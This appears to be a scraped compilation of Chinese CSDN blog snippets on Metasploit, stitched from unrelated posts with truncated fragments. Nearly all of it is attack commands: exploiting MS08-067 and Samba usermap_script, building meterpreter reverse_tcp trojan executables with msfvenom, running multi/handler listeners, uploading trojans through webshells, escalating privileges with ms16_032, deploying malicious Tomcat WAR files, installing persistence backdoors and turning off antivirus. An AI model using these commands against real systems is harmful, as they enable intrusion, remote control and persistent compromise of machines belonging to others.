msf

msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline generic/tight_loop normal Generic x86 Tight Loop windows/adduser normal Windows Execute net user /ADD windows/dllinject/bind_ipv6_tcp normal Reflective Dll

生成木马 Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe 配置监听程序 Msfconsole 打开Metaploit msf > use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.184.132 Exploit 现在将1.exe 通过菜刀或者webshell 上次到可写目录，并且执行 这样就监听成功了 获得一个session （会话） Getuid 查看主机名 shell 进入命令行模式 当然这里也可以加载exp Exit 返回到meterpeter模式 Background 返回 multi/handler use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 加载exp Session 1 返回之前的会话 Exploit 进行提权 这说明exp执行成功，可以进一步提权，内网渗透了 来源： CSDN 作者： 沧海NO1 链接： https://blog.csdn.net/u010025272/article

如果知道tomcat页面/manager的管理帐号与密码，可部署精心制作的war文件，以获得服务器相关的权限。 msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port USERNAME no The username to authenticate as VHOST no HTTP server virtual host Exploit

目录 当获取了CobaltStrike类型的session后，想派生一个MSF类型的shell 当获取了MSF类型的session后，想派生一个CobaltStrike类型的shell 来源： CSDN 作者： 谢公子 链接： https://blog.csdn.net/qq_36119192/article/details/98472536

msf > search samba msf > use exploit/multi/samba/usermap_script msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse msf exploit(multi/samba/usermap_script) > set RHOST 192.168.56.120 msf exploit(multi/samba/usermap_script) > show options msf exploit(multi/samba/usermap_script) > set RPORT 445 msf exploit(multi/samba/usermap_script) > set LHOST 192.168.56.119 msf exploit(multi/samba/usermap_script) > show options msf exploit(multi/samba/usermap_script) > exploit 注意： msf > set RHOST [victim_ip] m msf > set RPORT 445 m msf > set LHOST [our_ip] m msf > set LPORT [use default] 来源

搬迁到 Minggle’Blog ###本地提权漏洞检测 meterpreter > run post/multi/recon/local_exploit_suggester ###迁移到指定进程 migrate -N explorer.exe ###自动脚本 msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe msf exploit(multi/handler) > setInitialAutoRunScript migrate -n explorer.exe msf exploit(multi/handler) > set AutoRunScript post/windows/gather/dumplinks ##migrate 到指定用户进程 ###信息收集 meterpreter > run winenum ###持久后门 meterpreter > run persistence -h OPTIONS: -A Automatically start a matching exploit/multi/handler to connect to the agent -L <opt> Location in target host to write payload to, if none

msfpayload windows/meterpreter/reverse_tcp LHOST=10.24.194.155 LPORT=55555 X >text.exe 生成一个text.exe的木马文件 msf > use exploit/multi/handler 使用handler这个模块 msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 使用这个shellcode LHOST :10.24.194.155 LPORT :55555 这里填生成木马的ip 和端口 expload 先执行msf，在执行木马 由于开了360，开始就查杀了，添加信任后还是没用，然后就把360关了，再次打开，返回了个 已杀死 一脸懵逼的我。。 之后的命令。。。用help看吧。。。 把防火墙 360 都关了之后，成功了，啊哈， meterpreter > getuid Server username: JINC\asus 查看权限 >ps 查看进程，由于太多就不放这了 meterpreter > sysinfo 查看基本信息 Computer : JINC OS : Windows 8 (Build 9200). Architecture : x64 (Current Process is WOW64) System

参考： https://community.rapid7.com/thread/2083 In order to get multiple session on a single multi/handler, you need to set the ExitOnSession option to false and run the exploit -j instead of just the exploit. For example, for meterpreter/reverse_tcp payload, msf > use exploit multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set lhost < local IP > msf > set lport < local port > msf > set ExitOnSession false msf > exploit -j The -j option is to keep all the connected session in the background. 来源： CSDN 作者： caiqiiqi 链接： https://blog.csdn.net/caiqiiqi/article/details/73368173